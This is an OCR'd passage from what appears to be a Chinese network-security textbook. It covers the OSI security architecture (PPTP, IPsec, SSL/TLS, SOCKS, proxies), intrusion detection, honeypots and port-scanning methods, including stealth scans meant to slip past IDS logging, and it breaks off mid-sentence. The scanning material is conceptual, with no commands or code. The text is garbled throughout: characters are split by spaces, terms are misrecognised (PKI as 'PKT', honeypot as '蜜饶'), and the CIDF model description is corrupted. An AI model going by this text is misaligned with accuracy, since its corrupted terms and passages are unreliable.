6) 采用 认证 和 数字 签名 技术 : 认证 技术 用 以 解决 网 络 通讯 过 程 中 通讯 双方 的 身份 认可 ， 
数字 签名 技术 用 于 通信 过 程 中 的 不 可 抵赖 要 求 的 实现 。 

7) 采用 VPN 技术 : 我 们 将 利用 公共 网 络 实现 的 私 用 网 络 称 为 虚拟 私 用 网 VPN。 

除 上 述 技术 之 外 ， 我 们 还 通过 建立 有 效 的 安全 管理 制度 、 网 络 访问 控制 机 制 、 数 据 库 的 
备份 与 恢复 以 及 密码 技术 等 来 加 强 计算 机 网 络 安全 。 


2.5.2 OSI 安全 体系 结构 
ISO/OSI 模型 是 国际 标准 化 组 织 (ISO) 为 网 络 通 信和 制定 的 开放 系统 互 连 参考 模型 (Open 


System Interconnect，OSD。 根 据 网 络 通信 的 功能 要 求 ， 它 把 通信 过 程 分 为 七 层 ， 分 别 为 物理 
层 、 数 据 链 路 层 、 网 络 层 、 传 输 层 、 会 话 层 、 表 示 层 和 应 用 层 。 每 一 层 的 功能 是 独立 的 ， 
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它 利用 其 下 一 层 提供 的 服务 并 为 其 上 一 层 提供 服务 ， 而 与 其 他 层 的 具体 实现 无 关 。 这 里 所 谓 
的 “服务 ”就 是 下 一 层 向 上 一 层 提 供 的 通信 功能 和 层 之 间 的 会 话 规定 ,一 般 用 通信 原 语 实现 。 
两 个 开放 系统 中 的 同等 层 之 间 的 通信 规则 和 约定 称 为 协议 。 通 常 把 1~4 层 协议 称 为 下 层 协 
议 ，5 一 7 层 协议 称 为 上 层 协议 ， 如 图 2-3 所 示 : 
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图 2-3 OSI 七 层 网 络 示意 图 


从 图 2-3 可 以 看 出 分 层 的 优点 在 于 : 

1) 可 以 很 容易 地 讨论 和 学 习 协 议 的 规范 细节 。 

2) 层 间 的 标准 接口 方便 了 工程 模块 化 。 

3) 创建 了 一 个 更 好 的 互 连 环境 。 

4) 降低 了 复杂 度 ， 使 程序 更 容易 修改 ， 产 品 开发 的 速度 更 快 。 

5) 每 层 利用 紧邻 的 下 层 服务 ， 更 容易 记 住 各 层 的 功能 。 

同时 ，OSI 的 分 层 模型 还 为 网 络 安全 的 研究 提供 了 实用 的 抽象 概念 。 顶 部 的 安全 服务 可 


上 来 满足 特定 应 用 的 要 求 。 不 同 的 应 用 都 需要 自身 的 安全 协议 。 底 部 的 安全 服务 可 用 来 保护 


所 有 的 高 层 通信 ， 减 轻 应 用 层 协议 设计 者 安全 方面 的 设计 。 


在 分 层 模型 中 ，n 层 实 体 在 实现 自身 定义 的 功能 时 ， 直 接 使 用 n-1 层 提供 的 服务 ， 并 通 


3T n-1 层 间 接 使 用 n-2 层 以 及 以 下 所 有 各 层 的 服务 ; n 层 向 第 ntl 层 提供 服务 , 此 服务 包含 第 
n 层 本 身 和 下 层 服务 提供 的 功能 ， 相 邻 层 间 有 接口 ， 所 提供 服务 的 具体 实现 细节 对 上 一 层 完 
全 屏蔽 。 数 据 传递 由 上 层 到 下 层 ， 接 收 由 下 层 到 上 层 ， 除 物理 媒体 上 (最 底层 ) 进 行 的 事实 通 
信 外 ， 其 余 各 对 等 实体 间 ( 层 间 ) 都 是 虚 通 信 ; 虚 通 信 必 须 遵 循 该 层 的 协议 ; n 层 的 虚 通 信 是 通 
过 nm-l 层 间 接口 处 mn-l 层 提供 的 服务 以 及 m-l 层 的 通信 (通常 也 是 虚 通 信 ) 来 实现 的 。 层 间 的 
相互 关系 如 图 2-4 所 示 : 
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图 2-4 OSI 层 间 关系 示意 图 


建立 OSI 七 层 模型 主要 是 为 解决 异种 网 络 互 连 时 所 遇 到 的 兼容 性 问题 。 它 的 最 大 优点 是 
将 服务 、 接 口 和 协议 这 三 个 概念 明确 地 区 分 开 来 ; 但 是 ， 当 网 络 发 展 到 一 定 规模 的 时 候 ， 安 
全 性 问题 就 变 得 突出 起 来 。 所 以 就 必须 有 一 套 体系 结构 来 解决 安全 问题 ， 于 是 OSI 安全 体系 
结构 就 应 运 而 生 。 它 在 不 同 的 层次 上 都 有 不 同 的 安全 技术 : 

1. 数据 链 路 层 : 点 到 点 隧道 协议 PPTP)。 点 到 点 隧道 协议 PPTP, 英文 全 称 是 Point-to-Point 
Tunneling Protocole PPTP 是 用 于 在 中 间 网 络 上 传输 点 对 点 协议 PPP) 帧 的 一 种 隧道 机 制 。 通 
过 利用 PPP 的 身份 验证 、 加 密 和 协议 配置 机 制 ，PPTP 连接 同时 为 远程 访问 和 路 由 器 到 路 由 
器 的 虚拟 专用 网 (VPN) 连 接 提 供 了 一 条 在 公共 网 络 (比如 : Intemet) 上 创建 安全 连接 的 途径 。 
PPTP 将 PPP 帧 封装 成 卫 数据 包 , 以 便 在 基于 P 的 互联 网 上 传输 , 为 了 确保 数据 的 安全 性 ， 
通常 需要 事先 对 封装 的 数据 进行 加 密 。 

2. 网 络 层 : IP 安全 协议 (IPSEC)。IPSEC 在 网 络 层 提供 了 IP 报 文 的 机 密 性 、 完 整 性 、 人 P 
报 文 源 地 址 认证 以 及 抗 伪 地 址 的 攻击 能 力 。IPSEC 可 以 保护 在 所 有 支持 人 P 的 传输 介质 上 的 通 
信 ， 保 护 所 有 运行 于 网 络 层 上 的 所 有 协议 在 主机 间 进 行 安全 传输 。IPSEC 网 关 可 以 安装 在 需 
要 安全 保护 的 任何 地 方 ， 如 路 由 器 、 防 火 墙 、 应 用 服务 器 或 客户 机 等 。IPSEC 主要 由 三 个 协 
议 组 成 : 

a) AH(Authentication Header)， 认 证 报头 ， 提 供 对 报 文 完整 性 的 报 文 的 源 地 址 进行 认证 。 

b) ESP(Encapsulating Security Payload)， 封 装 安全 载荷 ， 提 供 对 报 文 内 容 的 加 密 和 认证 
功能 。 

c) IKE(Internet Key Exchange), Internet 密 钥 交换 ,协商 信 源 和 信和 宿 节点 间 保 护 他 报 文 的 
AH 和 ESP 的 相关 参数 ， 如 加 密 、 认 证 的 算法 和 密 钥 、 密 钥 的 生存 时 间 等 。 又 称 为 安全 联盟 。 
AH 和 ESP 是 网 络 层 协 议 ，IKE 是 应 用 层 协议 。 一 般 情 况 下 ，IPSEC 仅 指 网 络 层 协 议 AH 和 
ESP. HF IPSEC 服务 是 在 网 络 层 提供 的 ， 任 何 上 层 协 议 都 可 以 使 用 到 此 服务 。 

3. 传输 层 : 安全套 接 字 层 (SSL) 和 传输 层 安 全 协议 TLS。 安 全 套 接 字 层 (Secure Sockets 
Layer，SSL) 是 网 景 公司 (Netscape) 在 推出 Web 浏览 器 首 版 的 同时 提出 的 协议 。SSL 采用 公开 
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密 钥 技术 ， 保 证 两 个 应 用 间 通 信 的 保密 性 和 可 靠 性 ， 使 客户 与 服务 器 应 用 之 间 的 通信 不 被 攻 
击 者 窃听 。 它 的 工作 流程 主要 包括 两 个 阶段 : 

1) 服务 器 认证 阶段 :客户 端 向 服务 器 发 送 一 个 开始 信息 “Hello” 以 便 开始 一 个 新 的 
会 话 连接 ，@) 服 务 器 根据 客户 的 信息 确定 是 否 需要 生成 新 的 主 密 钥 ， 如 需要 ， 则 服务 器 在 响 
应 客户 的 “Hello ”信息 时 将 包含 生成 主 密 钥 所 需 的 信息 ; @ 客 户 根据 收 到 的 服务 器 响应 信息 ， 
产生 一 个 主 密 钥 ， 并 用 服务 器 的 公开 密 钥 加 密 后 传 给 服务 器 ，@ 服 务 器 回复 该 主 密 钥 ， 并 返 
回 给 客户 一 个 用 主 密 钥 认证 的 信息 ， 以 此 让 客户 认证 服务 器 。 

2) 用 户 认证 阶段 : 在 此 之 前 ,服务 器 已 经 通过 了 客户 认证 , 这 一 阶段 主要 完成 对 客户 的 
认证 。 经 认证 的 服务 器 发 送 一 个 提问 给 客户 ， 客 户 则 返回 (数字 ) 签 名 后 的 提问 和 其 公开 和 密 钥 ， 
从 而 向 服务 器 提供 认证 。 

SSL 目前 已 成 为 互联 网 上 保密 通讯 的 工业 标准 ， 现 行 Web 浏览 器 普遍 将 Http 和 SSL 相 
结合 ， 从 而 实现 安全 通信 。SSL 协议 的 优势 在 于 它 是 与 应 用 层 协 议 独立 无 关 的 。 高 层 的 应 用 


层 协议 (例如 : Http, FTP, Telnet 等 ) 能 透明 地 建立 于 SSL 协议 之 上 。SSL 协议 在 应 用 层 协 
议 通信 之 前 就 已 经 完成 加 密 算法 、 通 信 密 钥 的 协商 以 及 服务 器 认证 工作 。 在 此 之 后 应 用 层 协 
议 所 传送 的 数据 都 会 被 加 密 ， 从 而 保证 通信 的 私密 性 。SSL 与 传输 层 的 关系 如 图 2-5 所 示 : 


底层 协议 


图 2-5 SSL 与 传输 层 关 系 的 关系 图 


由 图 2-5 可 以 看 出 ，SSL 位 于 传输 层 之 上 。 

传输 层 安 全 协议 (TLS) 是 确保 互联 网 上 通信 应 用 和 其 用 户 隐私 的 协议 。 当 服务 器 和 客户 
机 进行 通信 ,TLS 确保 没有 第 三 方 能 窃听 或 次 取信 息 。TLS 是 安全 套 接 字 层 (SSL) 的 后 继 协 议 。 
TLS 由 两 层 构 成 : TLS 记录 协议 和 TLS 握手 协议 。TLS 记录 协议 使 用 机 密 方法 ， 如 数据 加 密 
标准 (DES)， 来 保证 连接 安全 。TLS 记录 协议 也 可 以 不 使 用 加 密 技 术 。TLS 握手 协议 使 服务 
器 和 客户 机 在 数据 交换 之 前 进行 相互 鉴定 ， 并 协商 加 密 算 法 和 密 钥 。TLS 利用 密 钥 算 法 在 互 
联网 上 提供 端点 身份 认证 与 通讯 保密 , 其 基础 是 公 钥 基 础 设施 public key infrastructure, PKT). 
不 过 在 实现 的 典型 例子 中 ， 只 有 网 络 服务 者 被 可 靠 身份 验证 ， 而 其 客户 端 则 不 一 定 。 这 是 因 
为 公 钥 基础 设施 普遍 商业 运营 ， 电 子 签名 证 书 相当 昂贵 ， 普 通 大 众 很 难 买 得 起 证 书 。 协 议 
的 设计 在 某 种 程度 上 能 够 使 主 从 式 架 构 应 用 程序 通讯 本 身 预防 窃听 、 干 扰 (Tampering) 和 消 
息 伪 造 。 

4. 会 话 层 : SOCKS 代理 技术 。SOCKS 是 一 种 网 络 传输 协议 ， 主 要 用 于 客户 端 与 外 网 服 
务 器 之 间 通 讯 的 中 间 传 递 。SOCKS 是 “SOCKetS” 的 缩写 。 当 防火 墙 后 的 客户 端 要 访问 外 部 
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的 服务 器 时 ， 就 和 SOCKS 代理 服务 器 连接 。 这 个 代理 服务 器 控制 客户 端 访问 外 网 的 资格 ， 
允许 的 话 ， 就 将 客户 端的 请 求 发 往外 部 的 服务 器 。 它 的 最 新 协议 是 版 本 5， 与 前 一 版 本 相 比 ， 
增加 支持 UDP, 验证 以 及 IPv6。 根据 OSI 模型 , SOCKS 是 位 于 应 用 层 与 传输 层 之 间 的 中 间 层 。 

5. 应 用 层 : 应 用 程序 代理 。 应 用 程序 代理 工作 在 应 用 层 之 上 , 位 于 客户 机 与 服务 器 之 间 ， 
完全 阻挡 了 二 者 间 的 数据 交流 。 从 客户 机 角度 看 ， 代 理 服务 器 相当 于 一 台 真 正 的 服务 器 ， 而 
从 服务 器 角度 看 , 代理 服务 器 又 是 一 台 真 正 的 客户 机 。 当 客户 机 需要 使 用 服务 器 上 的 数据 时 ， 
首先 将 数据 请 求 发 给 代理 服务 器 ， 代 理 服务 器 再 根据 这 一 请 求 向 服务 器 索取 数据 ， 然 后 再 
代理 服务 器 将 数据 传输 给 客户 机 。 由 于 外 部 系统 与 内 部 服务 器 之 间 没 有 直接 的 数据 通道 ， 外 
部 的 恶意 侵害 也 就 很 难 伤害 到 企业 内 部 网 络 系统 ， 并 对 应 用 层 以 下 的 数据 透明 。 应 用 层 代 理 
服务 器 用 于 支持 代理 的 应 用 层 协 议 ， 如 : HTTP、HTTPS、FTP、TELNET 等 。 由 于 这 些 协议 
支持 代理 ， 所 以 只 要 在 客户 端的 浏览 器 或 其 他 应 用 软件 中 设置 “代理 服务 器 ”项 ， 设 置 好 代 
理 服务 器 的 地 址 ， 客 户 端的 所 有 请 求 将 自动 转发 到 代理 服务 器 中 。 然 后 由 代理 服务 器 处 理 或 
转发 该 请 求 。 

综 上 所 述 ，OSI 安全 体系 结构 为 各 层 的 服务 提供 相应 的 安全 机 制 ， 有 效 地 提高 了 应 用 安 
全 性 。 随 着 技术 的 不 断 发 展 ,各 项 安全 机 制 相关 的 技术 不 断 提 高 , 尤其 是 结合 加 密 理论 之 后 ， 
应 用 安全 性 得 到 了 显著 提高 。 


2.5.3 ”入 侵 检 测 及 安全 扫描 


1. 入 侵 检测 


入 侵 检 测 是 一 种 积极 主动 的 安全 防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实 
时 保护 ,在 网 络 系统 受到 危害 之 前 拦截 和 响应 入 侵 。 入 侵 检 测 通过 执行 以 下 任务 来 实现 : 监 
视 、 分 析 用 户 及 系统 活动 ， 系统 构造 和 弱点 的 审计 ; 识别 反映 已 知 进攻 的 活动 模式 并 向 相关 
人 士 报警 ,异常 行为 模式 的 统计 分 析 : 评估 重要 系统 和 数据 文件 的 完整 性 ， 操 作 系 统 的 审 
计 跟 踪 管理 ， 并 识别 用 户 违反 安全 策略 的 行为 。 因 此 ， 我 们 可 以 得 出 入 侵 检测 的 定义 : 入侵 
检测 (Intrusion Detection) 是 对 入 侵 行为 的 检测 。 它 通过 收集 和 分 析 网 络 行为 、 安 全 日 志 、 
计数 据 、 其 他 网 络 上 可 以 获得 的 信息 以 及 计算 机 系统 中 若干 关键 点 的 信息 , 检查 网 络 或 系统 
中 是 否 存在 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 它 的 主要 功能 有 : 

。 监测 和 分 析 用 户 和 系统 的 活动 ; 

。 审计 系统 配置 和 漏洞 ; 

。 评估 系统 资源 和 数据 的 完整 性 ; 

。 识别 攻击 行为 并 报警 ; 

。 统计 分 析 异 常 行为 ; 

e 对 系统 安全 的 审计 管理 ， 识 别 违反 安 全 策略 的 用 户 活动 。 

实现 上 述 功能 的 软件 与 硬件 的 组 合 便 是 入 侵 检 测 系统 (Intrusion Detection System，IDS)。 一 
个 成 功 的 入 侵 检 测 系统 ， 它 不 但 可 使 系统 管理 员 时 刻 了 解 网 络 系统 (包括 程序 、 文 件 和 硬件 设备 
等 ) 的 任何 变更 ， 还 能 给 网 络 安全 策略 的 制订 提供 指南 ;更 为 重要 的 一 点 是 ， 它 应 该 是 管理 、 配 
置 简单 的 ， 从 而 使 非 专业 人 员 非 常 容 易 地 获得 网 络 安全 。 而 且 ， 入 侵 检测 的 规模 还 应 根据 网 络 
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威胁 、 系 统 构造 和 安全 需求 的 改变 而 改变 。 入 侵 检测 系统 在 发 现 入 侵 后 ， 会 及 时 作出 响应 ， 包 
括 切断 网 络 连接 、 记 录 事 件 和 报警 等 。 图 2-6 是 一 个 入 侵 检测 的 实例 图 : 


E NIIS 
E UN 8 主机 检测 模块 


hh DMZ 
9 
9 


内 部 网 络 


9 
服务 器 组 
图 2-6 入 侵 检 测 的 实例 图 


随 着 入 侵 检 测 系统 的 发 展 ， 各 产品 之 间 的 差异 所 引起 的 兼容 性 问题 也 日 益 突出 。 为 解决 
入 侵 检 测 系统 之 间 的 互 操作 性 ,IDS 标准 化 组 织 Common Intrusion Detection Framework(CIDF) 
阐述 了 一 个 入 侵 检 测 系统 的 通用 模型 。 它 将 一 个 入 侵 检 测 系 统 分 为 以 下 组 件 : 事件 生成 器 
(Eventgenerators)， 用 E 盒 表 示 ， 事件 分 析 器 (Eventanalyzers)， 用 A AKR: 响应 单元 
(Responseunits)， 用 R AKR: 事件 数据 库 (Eventdatabases)， 用 D AKR. 

CIDF 模 型 的 结构 如 下 : E 盒 通过 传感器 收集 事件 数据 ,并 将 信息 传送 给 A 盒 , A 盒 检测 
误 用 模式 ; D AFERKA A E 盒 的 数据 ， 并 为 额外 的 分 析 提 供 信息 ; R 盒 从 A、E 盒 中 提 
取 数 据 , D 盒 启 动 适 当 的 响应 。A、E、D 及 也 盒 之 间 的 通信 都 基于 通用 入 侵 检测 对 象 (GIDO) 
和 通用 入 侵 规 范 语言 (CISL)。 如 果 想 在 不 同 种 类 的 A、E、D 及 R 盒 之 间 实 现 互 操作 ， 需 要 
对 GIDO 实现 标准 化 并 使 用 CISL。 

IDS 数据 分 析 分 为 三 步 : 

1) 信息 收集 ;入 侵 检 测 的 第 一 步 是 信息 收集 ， 收 集 内 容 包括 系统 、 网 络 、 数 据 及 用 
户 活 动 的 状态 和 行为 。 由 放置 在 不 同 网 段 的 传感器 或 不 同 主机 的 代理 来 收集 信息 ， 包 括 
系统 和 网 络 日 志文 件 、 网 络 流量 、 非 正常 的 目录 和 文件 改变 、 非 正常 的 程序 执行 。 

2) 信息 分 析 : 收集 到 的 有 关系 统 、 网 络 、 数 据 及 用 户 活 动 的 状态 和 行为 等 信息 ， 被 
送 到 检测 引擎 ， 检 测 引 擎 驻 留 在 传感器 中 ， 一 般 通过 三 种 技术 手段 进行 分 析 : 模式 匹配 、 
统计 分 析 和 完整 性 分 析 。 当 检测 到 某 种 误 用 模式 时 ， 生 成 一 个 警告 并 发 送 给 控制 台 。 

3) 结果 处 理 : 控制 台 按照 告警 产生 预先 定义 的 响应 采取 相应 措施 ， 可 以 是 重新 配置 
路 由 器 或 防火 墙 、 终 止 进程 、 切 断 连接 、 改 变 文 件 属性 ， 也 可 以 只 是 简单 的 告警 。 

入 侵 检 测 系 统 所 采用 的 技术 可 分 为 两 种 : 

。 异常 检测 模型 (AnomalyDetection): 检测 与 可 接受 行为 之 间 的 偏差 。 如 果 可 以 定义 每 

项 可 接受 的 行为 ， 那 么 每 项 不 可 接受 的 行为 就 应 该 是 入 侵 。 首 先 总 结 正常 操作 应 该 
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具有 的 特征 (用 户 轮廓 )， 当 用 户 活 动 与 正常 行为 有 重大 偏离 时 即 被 认为 是 入 侵 。 这 种 
检测 模型 漏 报 率 低 ， 误 报 率 高 。 因 为 不 需要 对 每 种 入 侵 行为 进行 定义 ， 所 以 能 有 效 
检测 未 知 的 入 侵 。 

。 误 用 检测 模型 (MisuseDetection): 检测 与 已 知 的 不 可 接受 行为 之 间 的 匹配 程度 。 如 果 
可 以 定义 所 有 的 不 可 接受 行为 ， 那 么 每 种 能 够 与 之 匹配 的 行为 都 会 引起 告警 。 收 集 
非 正 常 操作 的 行为 特征 ， 建 立 相关 的 特征 库 ， 当 监测 的 用 户 或 系统 行为 与 库 中 的 记 
录 相 匹配 时 ， 系 统 就 认为 这 种 行为 是 入 侵 。 这 种 检测 模型 误 报 率 低 、 漏 报 率 高 。 对 
于 已 知 的 攻击 ， 它 可 以 详细 、 准 确 地 报告 出 攻击 类 型 ， 但 是 对 未 知 攻击 却 效果 有 限 
而 且 特 征 库 必须 不 断 更 新 。 

依据 IDS 应 用 对 象 的 不 同 ， 其 类 型 可 分 为 

e 基于 主机 的 IDS: 系统 分 析 的 数据 是 计算 机 操作 系统 的 事件 日 志 、 应 用 程序 的 事件 
日 志 、 系 统 调 用 、 端 口 调用 和 安全 审计 记录 。 主 机 型 入 侵 检 测 系 统 保护 的 一 般 是 所 
在 的 主机 系统 。 是 由 代理 (agent) 来 实现 的 , 代理 是 运行 在 目标 主机 上 的 小 的 可 执行 程 
序 ， 它 们 与 命令 控制 台 (console) 通 信 。 

e 基于 网 络 的 IDS: 系统 分 析 的 数据 是 网 络 上 的 数据 包 。 网 络 型 入 侵 检 测 系 统 担 负 着 
保护 整个 网 段 的 任务 ， 基 于 网 络 的 入 侵 检 测 系统 由 遍及 网 络 的 传感器 (senson) 组 成 ， 
传感器 是 一 台 将 以 太 网 卡 置 于 混杂 模式 的 计算 机 ， 用 于 噢 探 网 络 上 的 数据 包 。 

。 分 布 式 (混合 型 )IDS: 这 种 入 侵 检测 系统 一 般 为 分 布 式 结构 ， 由 多 个 部 件 组 成 ， 在 关 
键 主机 上 采用 主机 入 侵 检 测 ， 在 网 络 关键 节点 上 采用 网 络 入 侵 检测 ， 同 时 分 析 来 自 
主机 系统 的 审计 日 志和 来 自 网 络 的 数据 流 ， 判 断 被 保护 系统 是 否 受 到 攻击 。 

这 里 再 介绍 一 个 入 侵 检 测 的 传统 技术 “ 蜜 饶 ” 蜜 饶 (honeypob 是 用 于 跟踪 攻击 者 和 研究 、 
收集 黑客 活动 证 据 的 一 种 资源 。 它 们 模仿 真实 的 系统 ， 其 实 不 包含 真正 的 产品 信息 。 每 个 被 
监视 到 的 在 蜜 钠 上 的 活动 都 是 一 次 攻击 。 

蜜 饶 可 在 不 同 层次 上 用 于 与 攻击 者 的 交互 中 。 低 层次 交互 的 蜜 缸 模仿 操作 系统 基本 的 服 
务 。 在 这 种 蜜 缸 之 上 攻击 者 能 做 的 事 很 少 ， 蜜 缸 所 记录 的 攻击 性 行为 就 很 有 限 。 而 且 ， 攻 击 
者 可 能 会 很 快 地 识别 蜜 缸 的 真相 ， 然 后 逃走 。 现 在 也 有 很 多 检测 蜜 缸 的 工具 。 蜜 饶 模 仿 得 越 
逼真 ， 更 多 的 行为 就 会 被 监视 到 。 高 层次 交互 的 蜜 缸 提供 真实 的 服务 ， 但 提供 假 的 数据 。 攻 
击 者 与 蜜 饶 交互 得 越 多 ， 和 危险 越 大 ， 因 为 攻击 者 会 错误 地 把 蜜 缸 当 作 人 台阶 去 攻击 其 他 机 器 。 

2. 安全 扫描 


安全 扫描 技术 是 一 类 重要 的 网 络 安全 技术 ， 安 全 扫描 技术 与 防火 墙 、 入 侵 检测 系统 互相 
配合 ， 能 有 效 提高 网 络 的 安全 性 。 安 全 扫描 技术 的 基本 原理 是 采用 模拟 黑客 攻击 的 方式 对 目 
标 可 能 存在 的 已 知 安全 漏洞 进行 逐 项 检测 ， 以 便 对 工作 站 、 服 务 器 、 交 换 机 、 数 据 库 等 各 种 
对 象 进行 安全 漏洞 检测 。 安 全 扫描 技术 主要 分 为 两 类 : 主机 安全 扫描 技术 和 网 络 安全 扫描 技 
术 。 主 机 安全 扫描 技术 主要 针对 系统 中 不 合适 的 设置 和 脆弱 的 口令 ， 以 及 针对 其 他 与 安全 规 
则 抵触 的 对 象 进行 检查 等 ， 主 机 扫描 的 目的 是 确定 在 目标 网 络 上 的 主机 是 否 可 达 ， 网 络 安全 
扫描 技术 则 是 通过 执行 一 些 脚本 文件 模拟 对 系统 进行 攻击 的 行为 并 记录 系统 的 反应 ， 从 而 发 
现 其 中 的 漏洞 。 端 口 扫 描 技术 和 漏洞 扫描 技术 是 网 络 安全 扫描 技术 中 的 两 种 核心 技术 ， 并 且 
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广泛 运用 于 当前 较 成 熟 的 网 络 扫描 器 中 。 

通过 安全 扫描 ， 系 统管 理 员 能 够 发 现 所 维护 的 Web 服务 器 的 各 种 TCPAIP 端口 的 分 配 、 
开放 的 服务 、Web 服务 软件 版 本 和 这 些 服务 及 软件 呈现 在 Intemet 上 的 安全 漏洞 。 安 全 扫描 
技术 也 是 采用 积极 的 、 非 破坏 性 的 办 法 来 检验 系统 是 否 有 可 能 被 攻击 崩溃 。 它 利用 了 一 系列 
的 脚本 模拟 对 系统 进行 攻击 的 行为 ， 并 对 结果 进行 分 析 。 这 种 技术 通常 用 来 进行 模拟 攻击 实 
验 和 安全 审计 。 安 全 扫 措 系统 应 具有 以 下 功能 ， 协 调 其 他 安全 设备 ， 跟 踪 用 户 在 系统 中 的 行 
为 ， 报 告 和 识别 文件 改动 纠正 系统 的 错误 设置 ， 识 别 正在 受到 的 攻击 减轻 系统 管理 员 搜 
索 黑 客 行为 的 负担 ， 为 制定 安全 规则 提供 依据 。 

3. 安全 扫描 过 程 


一 次 完整 的 网 络 安全 扫描 可 分 为 3 个 阶段 。 第 1 阶段 ,发 现 目标 主机 或 网 络 。 第 2 阶段 ， 
发 现 目标 后 进一步 搜集 目标 信息 ， 包 括 操作 系统 类 型 、 运 行 的 服务 及 服务 软件 的 版 本 等 。 如 
果 目 标 是 一 个 网 络 ， 还 可 以 进一步 发 现 该 网 络 的 拓扑 结构 、 路 由 设备 及 各 主机 的 信息 。 第 3 
阶段 ， 根 据 搜集 到 的 信息 判断 或 者 进一步 测试 系统 是 否 存在 安全 漏洞 。 按 照 扫 描 过 程 来 分 ， 
扫描 技术 又 可 以 分 为 4 大 类 : ping 扫描 技术 、 端 口 扫描 技术 、 操 作 系 统 探 测 技术 、 如 何 探测 
访问 控制 规则 以 及 已 知 漏洞 的 扫描 技术 。 

ping 扫描 用 于 网 络 安全 扫描 的 第 1 阶段 ， 可 以 帮助 识别 系统 是 否 处 于 活动 状态 ; 操作 系 
统 探测 、 如 何 探测 访问 控制 规则 和 端口 扫描 用 于 网 络 安全 扫描 的 第 2 阶段 ， 其 中 操作 系统 探 
测 是 对 目标 主机 运行 的 操作 系统 进行 识别 ， 如 何 探测 访问 控制 规则 用 于 获取 被 防火 墙 保护 的 
远 端 网 络 的 资料 , 而 端口 扫描 是 通过 与 目标 系统 的 TCP/IP 端口 连接 , 查看 该 系统 处 于 监听 或 
运行 状态 的 服务 ， 漏 洞 扫 描 通 常 是 在 网 络 安 全 扫描 的 第 3 阶段 ， 是 在 端口 扫描 的 基础 上 ， 对 
得 到 的 信息 进行 相关 处 理 ， 进 而 检测 出 目标 系统 存在 的 安全 漏洞 。 

ping 扫描 的 目的 就 是 确认 目标 主机 的 IP 地 址 ， 即 扫描 的 IP 地 址 是 否 分 配 了 主机 。 对 没 
有 任何 预知 信息 的 黑客 而 言 ，ping 扫描 是 进行 网 络 扫描 及 入 侵 的 第 一 步 ， 也 是 必 不 可 少 的 一 
步 ， 对 已 经 了 解 网 络 整体 IP 划分 的 网 络 安全 人 员 来 讲 ， 也 可 以 借助 ping 扫描 ， 对 主机 的 IP 
分 配 有 一 个 精确 的 定位 。 大 体 上 ，ping 扫描 是 基于 ICMP(Intemet Control Message Protocol) P) 
议 的 ， 因 此 把 发 现 目的 网 络 或 主机 的 一 类 基于 ICMP 协议 的 扫描 称 为 ping 扫描 。 ping 扫描 的 
主要 思想 就 是 构造 一 个 ICMP 包 ， 发 送 给 目标 主机 ， 从 目标 主机 生成 的 响应 来 进行 判断 。 

ping 扫描 能 确定 目标 主机 的 TP 地 址 ， 随 后 可 以 通过 端口 扫描 ， 探 测 主机 所 开放 的 端口 。 
因为 端口 扫描 通常 只 做 最 简单 的 端口 联通 性 测试 ， 不 执行 进一步 的 数据 分 析 ， 因 此 比较 适合 
进行 大 范围 的 扫描 : 对 指定 IP 地 址 进行 某 个 端口 值 范围 的 扫描 ， 或 者 指定 端口 值 对 某 个 IP 
地 址 段 进行 扫描 。 然 后 基于 端口 扫描 的 结果 ， 进 行 操作 系统 探测 和 弱点 扫描 。 端 口 扫描 技术 
发 展 到 现在 可 细 分 为 许多 类 型 ,按照 端口 连接 的 情况 ， 端 口 扫描 可 分 为 TCP 连接 扫描 、 半 连 
接 扫描 和 秘密 扫描 。 其 中 TCP 连接 扫描 是 端口 扫描 最 基础 的 一 种 扫描 方式 。TCP SYN 扫描 
在 扫描 过 程 中 没有 建立 完整 的 TCP 连接 ， 这 与 TCP 连接 扫描 不 同 ， 故 又 称 为 半 连 接 扫 描 。 
秘密 扫描 包含 有 TCPFIN 扫描 、TCPACK 扫描 等 多 种 扫描 方式 其 他 端口 扫描 技术 包含 UDP 
扫描 和 了 下 分 段 扫描 等 。 
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4. 端口 扫描 技术 


1) TCP 全 连接 扫描 

TCP 全 连接 扫描 就 是 和 目的 主机 建立 一 个 TCP 连接 , 而 目的 主机 的 log 文件 中 会 生成 记 
Ko 扫描 主机 通过 TCP/IP 协议 的 三 次 握手 与 目标 主机 的 指定 端口 建立 一 次 完整 的 连接 。 连接 
由 系统 调用 连接 指令 开始 。 如 果 端 口 开 放 ， 则 连接 将 建立 成 功 ， 否 则 ， 若 返回 -1， 则 表示 端 
口 关闭 。 目 标 主 机 的 指定 端口 以 ACK 响应 扫描 主机 的 SYN/ACK 连接 请 求 ， 这 一 响应 表明 
目标 端口 处 于 监听 (打开 ) 的 状态 。 如 果 目 标 端 口 处 于 关闭 状态 ， 则 目标 主机 会 向 扫描 主机 发 
送 RST 的 响应 。 


2) TCP SYN 扫描 

全 连接 扫描 中 扫描 主机 和 目的 主机 建立 一 个 TCP 连接 , 目的 主机 的 log 文件 中 会 生成 记 
录 。 与 全 连接 扫描 相对 应 ， 半 连接 扫描 也 称 为 TCP SYN 扫描 。TCP SYN 扫描 ( 半 开 放 扫描 ) 
是 利用 3 次 握手 的 弱点 来 实现 的 。 通 过 向 远程 主机 的 端口 发 送 一 个 请 求 连接 的 SYN 数据 报 
文 ， 如 果 没 有 收 到 目标 主机 的 SYN/ACK 确认 报 文 ， 而 是 RST 数据 报 文 ， 就 说 明 远 程 主机 的 
这 个 端口 没有 打开 。 而 如 果 收 到 远程 主机 的 SYN/ACK 应 答 ， 则 说 明 远 程 主机 端口 开放 。 在 
收 到 远程 主机 的 SYN/ACK 后 ， 不 再 做 ACK 应 答 ， 这 样 3 次 握手 并 没有 完成 ， 正 常 的 TCP 
连接 无 法 建立 ， 因 此 这 个 扫描 信息 不 会 被 记 入 系统 日 志 ， 不 会 在 目标 主机 上 留 下 记录 。 


3) 秘密 扫描 技术 

秘密 扫描 是 一 种 不 被 审计 工具 所 检测 的 扫描 技术 。 很 多 防火 墙 和 路 由 器 对 半 连 接 扫 描 都 
有 了 相应 措施 ， 这 些 防火 墙 和 路 由 器 会 对 一 些 指定 的 端口 进行 监视 ， 将 对 这 些 端口 的 连接 请 
求全 部 进行 记录 。 秘 密 扫描 能 躲避 IDS、 防 火 墙 、 包 过 滤器 和 日 志 的 审计 ， 从 而 获取 目标 端 
口 的 开放 或 关闭 的 信息 。 这 种 技术 不 包含 标准 的 TCP 三 次 握手 协议 的 任何 部 分 ,所 以 无 法 被 
